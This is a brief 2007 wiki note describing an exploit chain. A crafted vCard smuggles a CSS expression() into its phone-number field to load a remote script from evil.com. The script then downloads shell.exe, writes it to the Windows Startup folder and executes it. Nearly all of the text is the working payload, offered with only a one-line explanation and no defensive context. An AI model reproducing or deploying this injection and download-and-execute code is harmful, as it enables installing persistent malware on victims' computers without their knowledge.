2007 08 29 0x000b GAMMAH Notes

So here's the details on it:

The vcard looks like this:
BEGIN:VCARD
VERSION:3.0
FN:Inspector Gadget
TEL;type=HOME:' style='c:expression(document.all[document.all.length-1].src="http://evil.com/file.js")
END:VCARD

The contents of file.js:
var url="http://evil.com/shell.exe";
var path=System.Environment.getEnvironmentVariable("APPDATA") + "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\shell.exe";
var x = new XMLHttpRequest();
x.open("GET", url, true);
x.send();
var a = new ActiveXObject("ADODB.Stream");
a.Type = 1;
a.Open();
a.Write(x.responseBody);
a.SaveToFile(path, 2);
a.Close;
a = null;
System.Shell.execute(path);

This saves shell.exe to the user's startup folder, then runs it.

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.